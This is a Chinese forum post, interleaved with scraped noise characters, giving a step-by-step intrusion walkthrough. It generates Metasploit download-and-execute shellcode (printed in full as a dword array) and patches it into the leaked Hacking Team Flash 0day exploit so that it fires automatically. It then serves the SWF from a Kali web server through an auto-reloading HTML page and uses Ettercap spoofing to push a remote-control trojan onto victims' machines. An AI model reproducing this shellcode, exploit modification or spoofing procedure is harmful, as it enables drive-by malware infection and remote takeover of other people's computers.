|
2 u' w3 ]( F: H& Y
三、flash 0day之手工代码修改制作下载者实例入侵演示 8 j r/ x( |7 _0 Q! n i
( `& L4 Y5 R/ ]4 E1 l, M! s# ]! T- T* b3 X6 [
利用到的工具:
- {5 R/ [" n# ]& G & A4 L) M) L- U0 ]: @' k7 n
0 O5 @3 q, i8 |7 y2 E
Msf 7 P# M2 @4 x* ], h0 {# y
! u: h" Q+ S O) R' B1 {- H w- y% V9 `- E/ z! G! k
Ettercap / |( d! R5 u/ F( Q: m
0 B! q7 f, |& [* d) ]! i- i0 ~% G% D! j$ }: O U H
Adobe Flash CS6
2 C/ s, M0 c+ a ( Y4 I4 ]- `2 s) a
9 u& i8 ^. q* R! J" a0 I Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
2 f% l8 l4 Q9 V9 z0 `* j$ a 3 X- x5 T. r/ T4 s
$ _! }. q" N; K
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
( O7 W- @3 l/ } 2 B% g4 ~; h" l- ^& ]' E' ~5 E
3 q) p6 G2 F0 f I/ R1 q 如图:
: L4 g% S8 Z% w6 u+ h8 p
: z' @+ l, o: w! a+ K7 v
4 C9 U) P7 v) g3 ]( D* n / s0 `5 M( J9 v+ M/ K$ e
9 e2 o5 u7 u9 x' X
7 X+ j# h# H! K4 Y7 } 
; V1 |) E4 P' m j
4 n" L7 @% k/ S8 b! X# N+ Q- F7 C9 o$ i3 q# c
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) n: q7 ~. L! T" [
/ Q& B3 M: z9 T, E4 _$ N- _6 Z4 A0 w4 H3 @* Q1 b x, e
8 V }! e3 w( ]' |
$ r; b' U7 n8 q: F% V9 c8 W
( y% o- H m# t( W& H9 j  ( |5 h3 N. w7 `
5 h# G3 X9 O( I( U9 U
# q, d' H$ Q# Q 然后执行generate -t dword生成shellcode,如下: 3 T! ~8 C! U7 C# E- A6 k
. r. c+ \" s# ]! w- Q6 `
0 o/ d9 v( Q1 V; z, U' N5 ~- ~ 
7 ]% N8 W+ A! y1 o6 x& m" J
( ?& _5 d) ?2 k. h2 G+ ^9 n0 O4 k$ b# {, c$ b' ^
复制代码到文本下便于我们一会编辑flash exp,如下:
- `* ]: v$ {3 W W
* W: f* d7 [( o% n: b( l' r6 r" S6 P9 H* ]( l0 {" M6 K! h0 q
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
2 n0 D# j$ T2 G# t$ L8 o( |8 f 1 a) `( G8 r7 V( h9 f. h* Z
% `/ g! g" |0 U+ k% p
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, * u+ S$ u. W' Z* a3 E' V8 d3 f
( g( G* p! ?, K$ F5 Q, w) }7 K; T1 X
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + k7 D5 K m2 B6 l6 n
9 o7 \+ J4 x3 l: a
; P) ~% K- G( i5 Y8 d. O 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 6 |% ?; F# D* ~5 n, T9 O
# |# O6 m5 {. _# |
4 u, A9 u5 T, h$ {5 O, D% B5 F E 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
! Q9 x- C0 l% ]
9 F9 m! T$ p+ P5 e% j, R9 a2 V' s4 ]2 Q" D; j
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, % d, b' ^- B( N8 H1 k' q4 P
1 K0 X& ~0 w, o7 G' q6 K. s# H8 R4 |! }( N
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
' I5 z& C3 i8 p0 m
& }! [0 d" @, U; c- m7 E2 G4 Z/ s* @& @
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
, ~; W/ x, X0 V V
- b7 D7 G6 m& w/ |& v; _
; v+ I! I W; [; O, v5 W: N% R 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 3 m& l6 c, x; N/ @, Q
, O l7 B$ b/ x3 m! Z/ o0 \( H" c/ i% c$ W0 U& F
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : j- w2 l4 v D; f Y) F9 g
1 v, x {# d5 f# S
$ ]2 p: q% ?: K, g0 v$ G 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % X- W% _7 v+ ~5 W( S$ k
+ y' C/ i9 ?4 Z; |& P4 q8 O$ R. n
: }% u* C: Y; S- z/ C 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
0 X& e. [3 A! R+ ]0 O1 O* A0 }& W7 i ' S. X Y1 `, ~+ M& `
, f9 Y" O! m: a& K9 o+ W! l
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
9 x5 g l' K0 A X% h 5 V' m" o- j, r
5 s: Z9 E, L; U; W
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ; K! b* d/ l4 ~/ m$ F
: r9 V; c$ s) n r
5 K* w; o. Y R! N9 A 6 i8 s7 s V# ?0 V5 O3 H/ u
! N- U1 Q' C$ a3 N5 b" z, Q
& \0 `% x$ D2 M) x5 o( I _
4 T! v; r R' G9 B: ^8 _8 ] 3 D! r/ `8 p- h
/ A, d: ^6 _$ u* g 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
; j0 j) q; i9 [4 [' n$ H, F; q6 f7 l% B
/ K2 E, }, V6 L5 n% Z7 V; I6 x0 U; e& A w* Z) m* Z6 ~, Q1 T
: U$ y: E6 m. i3 W" x. J: x" d" K
- Y0 G8 |; S; k$ l" n* K3 Z# U. w7 z% @# j& P9 d% c
先修改ShellWin32.as,部分源代码如图:
2 B) i: w- I6 z H4 |! Q4 | ! F& [4 k& g! {1 j! W5 _% T
# s* ?/ C/ o" L% F( V+ k2 t6 _ 
7 }# Y$ r! d9 K4 \$ }0 Y, c
* f( ]# Y$ \( U2 y2 l7 V! e; h5 ` p$ N3 b
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: , c& t& j2 W9 r) P& C- }6 o- q" a
8 h- S- a! J% n, b# p
8 z' N/ \( D8 L9 V. Q 
" d* ~' ^* ]. R
! N; J/ P8 M) H- G; ]7 Q
% J0 f3 X! L- B+ {/ M 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: . D; ^7 `/ v' L) \$ F& e6 ]8 R8 W
' f$ I ?4 I- F" f% r
6 b9 O3 |2 _- m5 u! S 
: ?( z7 G- X3 p+ r6 J1 K8 `' a
; V6 U% x, d* u2 l K& x% x! E" j2 W4 ~/ d: d
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: , Y; d" ?5 J, }
# Z; H K' |$ t! R9 x9 X, m1 C. R6 k8 M7 Y# ]
& x4 Q3 R/ P2 E- i+ g, n: z4 r! p
% N% X D$ P) ^6 Y) H
$ c6 a7 Z4 I& i( {3 N+ H; ~
) N% g* c! S9 K& S, G / ^/ q0 s! A4 j. F) z' p
$ r. k9 t5 l+ f, E2 [
& `) A# a0 Q$ C9 ] m& r# \! _: _2 Z3 b
0 P R3 W# J1 i& l$ [' b6 K" q 然后点保存,下面我们来编译一下,打开
$ ~5 J5 K& T t* d5 S# I( u
, Y7 m7 g6 K8 X8 V8 c/ S& w7 |3 y0 f) V- h- {7 _( c6 E- A
exp1.fla然后点文件-发布,看看编译没错误
4 I8 a6 s% v7 D& Q1 W; e& o6 c
9 C, O' W- h) [. ?3 {9 ~) ` t+ g7 h0 Z1 ?
: u1 c& k- U& q
/ p4 V/ K* F4 W7 N+ B$ @* M# d, m6 b, B. S
- ~/ {+ _8 w* N; u6 j 9 R3 U$ d6 \" ^5 j4 m
- g& T- c( j) s' K7 K 4 {, [" p0 [) H$ H* n! m
U; q, S! c/ l T: K* x9 |' Q& ^' A
+ |; E$ @6 G; W: I1 ^
7 R* y" O: r( n0 o1 ?0 n6 T1 A
# ~% @4 K- _' s" z: w7 X9 Q2 n8 ~- _! a: R4 h
然后我们把生成的 - [6 |, n5 F) Z
: T' R3 ^! `& Z$ ?6 g0 N( S" B% F) W5 v! u# G
exp1.swf丢到kailinux 的/var/www/html下: . ]6 V+ X! o% W: ~' x r/ t
: W1 b, p; N# A5 Y' H
8 D8 k( c' o/ r9 m- G% i 然后把这段代码好好编辑一下
6 u2 O: c) K9 |: Q
8 p3 p2 V. u) \' ~3 L+ q3 K" ]7 W" F
- l" }1 c* |" v5 c4 S
: _' F. z, ^7 R. l! c8 a6 U5 S
, F" P, P+ f6 T
3 M8 z; {5 U# Y5 C8 {3 | ' `/ u* a! Q& |! J
; @& l+ n) J/ \! D
6 H0 s# k) V! E; y: g$ I # e6 Q) L6 P: [7 X3 c9 X7 L& u' E; }9 z
3 i V# B% Q" t$ ]/ @0 i" B
5 ^6 a. R4 P: ^. X3 `
0 {# \* f/ E+ m) F" q
" ^1 P' m* @ a& ]3 U% S* u6 ?
" c4 Y+ u& } t3 q 2 m5 E0 n" W$ C8 A
/ v l3 t/ z7 }. [/ B$ V
' V5 c/ P( A8 j3 P& R! P( \+ o6 K, Y
3 R2 K" _9 ~+ ]+ b/ b
1 R9 _6 Z1 ^7 n! q <!DOCTYPE html>
7 D. _9 a6 F5 e/ M% @
( z! ^& B( ]/ N/ V. Z" ^' K
8 a2 L( `' w4 h- d. n <html> 0 d! M0 q J9 C a, r
1 |( a# y; W6 G+ |! P( J8 F& A6 R% G9 A# X, b0 J# n
<head> - n8 d4 p# d6 X9 f
# E2 q1 r3 D& \/ K& d$ ]. T) G4 G
: Y$ n4 l+ P& t9 a% x5 O <meta http-equiv="Content-Type" content="text/html; . S) ]1 |/ g: j) ^- k8 h
4 {: X% B" [8 W) p" f" W6 W, U1 T% b; B; ^! S7 E3 `
charset=utf-8"/> ; O; H: J0 e6 q
7 ?5 ^5 k" M5 {* `1 {! p3 x6 z2 \! P$ j7 O9 ?5 R
</head> * @4 X/ B0 Y3 h& U0 L. V8 w
: h+ o4 {( W0 [" z( [' r% o# @
% t, T ^2 m* h. O
<body>
& R/ U) ^0 s+ C# z* u. K
4 E8 m3 G0 x, U' P5 z4 V' y) l% n% p3 Y# Q* g' e, S
<h2> Please wait, the requested page is loading...</h2>
1 Q8 A3 ~4 P! s" v! `2 U
% K5 V) l! Y9 ]3 p( Y* V, P. N, e3 K; g$ s* F: _3 D
<br>
3 `# I5 O0 {6 K6 y6 K8 Y 0 W5 @9 I9 V [ w. K( H/ d8 P
$ [' O6 q. W' E: w9 M+ F
<OBJECT / q# U: D& |5 {& d) C
1 V' b) l: _6 B# V8 l
9 f6 k8 ]. S! Z: u) d9 V- t6 S classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie / q" v0 R( o* l- k% K) K# X! y) ~
2 j# o) j3 m+ E2 y$ s' S- u
( o& @' s4 k8 D6 [3 `$ N8 d9 k VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
! b/ x7 D6 [8 O" z# D1 J/ _
+ f& {) r' u* p: ~. z8 A+ o3 y1 Y G4 w" `& a
</body> , ]; b6 X4 E! J: N5 X, T
, X" _: ?3 W. x) k/ o
6 p1 m s/ C6 A2 E3 u9 \3 E8 t <script>
7 s3 R& P1 \, v2 L' Q& d- M) h7 ]9 g 5 u6 \* d) V, R. S- {2 V
9 ]% i* Q$ r C* k* h$ g
setTimeout(function () { $ h& {" o' a @3 ]
2 }. W2 ?7 M* I( @; M6 z$ u
" g0 a1 n4 [' U& Y
' h3 P. S% |+ M# w/ N& j0 \ 3 n* y% @/ y5 C+ I% z* z! ? z4 G
; a0 N, J! E) \& k
window.location.reload();
- f/ B4 {( @" T5 |( Y G 5 x6 p2 R/ ` ]* m- r( C
% g! V! W B1 u: D) ~
}, 10000); " h. w( _& F6 b% p
" Q( Z8 Z% V& |0 S
' l' S ~9 Z# A" Q7 D9 U& T
+ \4 O) a$ o& e' N$ K/ ]1 d( S4 z
. x0 h$ D& |: ^4 Q- N
$ m) `- ^/ B0 C% l8 b0 {/ N </script> % t1 F& x+ V" M- J* F7 f
% N( j. u5 G* h& @3 t. Y
. ]; K h) n9 p </html> # t# V$ ]6 w8 l- B
5 w. t5 U4 ]- k+ X6 I. c- H p# B
/ i1 y% B# T# Y! N- ~
: w ~$ a( N& }, R
. m0 V' l% @0 J* Q, ^* E
# t1 t. p8 P# c1 I 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
1 F9 h) z; I. ?4 G2 a4 `" l
' Q. U' M. N; i) L8 Y+ O
- s& Y5 S% v! Z& C ` 
! I' Q9 D* C7 i2 ]' L. F( d. f2 @
$ W3 [8 W: l$ {+ A% E- E+ w; [1 i
" r; V2 c# d3 Q % l, |4 w1 ^, q, ^, m+ I+ I' ?4 e
# ]; B+ _" s/ q! I
' k% J4 f, b/ z' M' ^5 N, G
/ M, L1 b: A5 @+ o! ]
9 G( H) ^- T! {4 a. F' N: l1 n
; Z; m, e- s' Q; {2 o% R # n9 ?( ?) L; F) v
! e& K5 P7 l! g! o" C3 _9 T( V( e/ J3 M* n9 I9 h. J" w
3 _! g4 c! @# `( m/ z' l9 v, `2 s 7 q; ?( C" _; i( v R3 e
7 n1 J9 u/ T! ?
下面我们用ettercap欺骗如图: 9 y% F5 J4 T* @% }
4 ]; K: u3 g' F( B: b; N+ O/ k3 r$ M* o
 ' S" ]# [! _3 o8 w- F" K4 @
0 g+ t) Y8 {# f! W+ Z( E: m2 ?* }) l4 |
+ Z7 v; i6 L' e1 s4 y* I4 w 8 ^# I) `, r2 O, E% ^2 B1 E! b
. v, J- |, [! c6 A 下面我们随便访问个网站看看:
3 s/ ?' g- I5 s" @0 r, H
) d: r; l% {' V8 \' e0 U1 E
6 i( K5 E8 h( ?: p* | 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! d. E2 S* N- v/ t# v
- k; Y% E) m4 \) U6 j& t' L+ V' W) k o6 `
 4 ?. W2 }) l) c* R
* ?0 ?! h7 P/ K5 k4 V Y
2 o6 T5 ^; h) r. W" S# ]4 u+ a 我们看另一台,
* f& e1 K) E' i5 I6 j" N ) s* \; N' O, o8 C5 J$ e
8 s( m" {) R, u# r3 t3 M2 q( Z* b
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
2 p# U% z" t6 T0 ^# g | 
发表于 2018-10-20 20:28:55
收藏
支持
反对